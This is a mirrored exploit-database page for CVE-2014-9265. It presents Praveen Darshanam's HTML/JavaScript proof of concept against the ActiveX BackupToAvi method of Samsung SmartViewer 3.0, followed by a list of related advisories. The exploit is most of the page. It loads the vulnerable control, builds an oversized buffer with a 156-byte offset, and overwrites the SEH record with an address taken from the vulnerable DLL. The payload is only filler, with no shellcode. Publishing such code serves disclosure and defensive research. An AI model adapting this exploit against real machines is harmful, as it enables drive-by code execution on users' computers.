Lucene search
Praveen DarshanamPACKETSTORM:130011HistoryJan 19, 2015 - 12:00 a.m.
Samsung SmartViewer BackupToAvi 3.0 Remote Code Execution
2015-01-1900:00:00
Praveen Darshanam
packetstormsecurity.com
24
0.598 Medium
EPSS
Percentile
97.8%
`<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam
For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++)
{
buf1 += "A";
}
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;
//remaining buffer
for (j=0; j<(payload_length-junk.length); j++)
{
buf2 += "B";
}
//final malicious buffer
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
</script>
</html>
`
Related
zdt
zdt
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution Exploit
2015-01-20 00:00:00
cvelist
cvelist
CVE-2014-9265
2014-12-08 16:00:00
cve
cve
CVE-2014-9265
2014-12-08 16:59:06
prion
prion
Stack overflow
2014-12-08 16:59:00
exploitpack
exploitpack
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
2015-01-19 00:00:00
nvd
nvd
CVE-2014-9265
2014-12-08 16:59:06
zdi
zdi
exploitdb
exploitdb
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
2015-01-19 00:00:00
checkpoint_advisories
checkpoint_advisories